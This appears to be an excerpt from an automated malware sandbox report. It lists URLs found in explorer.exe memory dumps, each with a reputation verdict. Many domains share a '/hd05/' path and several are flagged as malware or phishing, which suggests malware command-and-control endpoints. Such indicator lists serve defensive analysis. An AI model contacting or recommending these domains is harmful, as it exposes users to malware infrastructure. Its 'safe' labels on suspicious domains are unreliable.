http://www.1509068.cc/hd05/	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.furanoikedanouen.com/hd05/	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.codyscalls.comReferer:	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.connect-talent.comReferer:	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gaiacoreresearch.com/hd05/	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lezxop.xyzReferer:	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?FP	explorer.exe, 0000001C.00000002.3866982528.0000000003294000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3700126244.0000000003294000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3702761587.0000000003294000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thingsidonaked.com/hd05/	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.blogonrunning.comReferer:	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.q3hjns.shop/hd05/www.blogonrunning.com	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.damtherncooling.com	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 0000000A.00000002.2430854965.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1451364940.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.evans-gdaddy-test-domain.online	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.attack.info	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.thingsidonaked.comReferer:	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.7727.info	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dropshunter.net	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dropshunter.net/hd05/	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 0000000A.00000000.1451364940.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1486110658.000000000BCAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2430854965.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 0000000A.00000000.1451364940.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1486110658.000000000BCAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2430854965.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sparkfirestarter.net	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lorenzodavissr.com	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.aquariusbusiness.info	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.lorenzodavissr.com/hd05/www.q3hjns.shop	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thingsidonaked.com/hd05/www.lorenzodavissr.com	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.trexendofparadise.club/hd05/	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.lezxop.xyz/hd05/	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.thierrydoublein.comReferer:	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 0000000A.00000003.1480835602.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1445045558.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2426276889.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.blogonrunning.com/hd05/	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.thierrydoublein.com/hd05/	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.q3hjns.shopReferer:	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.7727.infoReferer:	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aquariusbusiness.info/hd05/	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/crypto/icons/Cryptoc2112Image.png	explorer.exe, 0000001C.00000003.2431529850.0000000004857000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.attack.info/hd05/	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.q3hjns.shop	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sparkfirestarter.net/hd05/www.evans-gdaddy-test-domain.online	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.damtherncooling.comReferer:	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.furanoikedanouen.com/hd05/www.gaiacoreresearch.com	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
